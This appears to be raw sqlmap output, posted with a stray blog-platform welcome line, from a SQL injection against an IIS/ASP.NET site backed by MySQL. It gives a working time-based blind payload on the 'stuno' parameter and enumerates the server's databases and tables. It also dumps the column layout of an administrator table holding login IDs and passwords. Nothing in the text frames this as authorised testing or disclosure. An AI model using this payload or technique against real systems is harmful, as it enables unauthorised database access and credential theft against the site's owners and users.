web server operating system: Windows 7 or 2008 R2
web application technology: Microsoft IIS 7.5, ASP.NET 4.0.30319, ASP.NET
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
available databases [8]:
[*] AbmsService
[*] hsdsecurityvideo
[*] information_schema
[*] logcenter
[*] mysql
[*] performance_schema
[*] PortalService
[*] test
---
Parameter: stuno (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: stuno=1' AND (SELECT 6661 FROM (SELECT(SLEEP(5)))JTkE) AND 'czzx'='czzx
---
Database: logcenter
[3 tables]
+--------------+
| ds_loginlog |
| ds_manager |
| ds_watchinfo |
+--------------+
Database: test
[2 tables]
+--------------------+
| dataCollectionTest |
| data_studentno |
+--------------------+
Database: mysql
[24 tables]
+---------------------------+
| user |
| columns_priv |
| db |
| event |
| func |
| general_log |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| ndb_binlog_index |
| plugin |
| proc |
| procs_priv |
| proxies_priv |
| servers |
| slow_log |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
+---------------------------+
Database: logcenter
Table: ds_manager
[5 columns]
+----------------+--------------+
| Column | Type |
+----------------+--------------+
| createtime | datetime |
| id | int(11) |
| logintime | datetime |
| manageid | varchar(765) |
| managepassword | varchar(765) |
+----------------+--------------+
欢迎加入 Typecho 大家族
555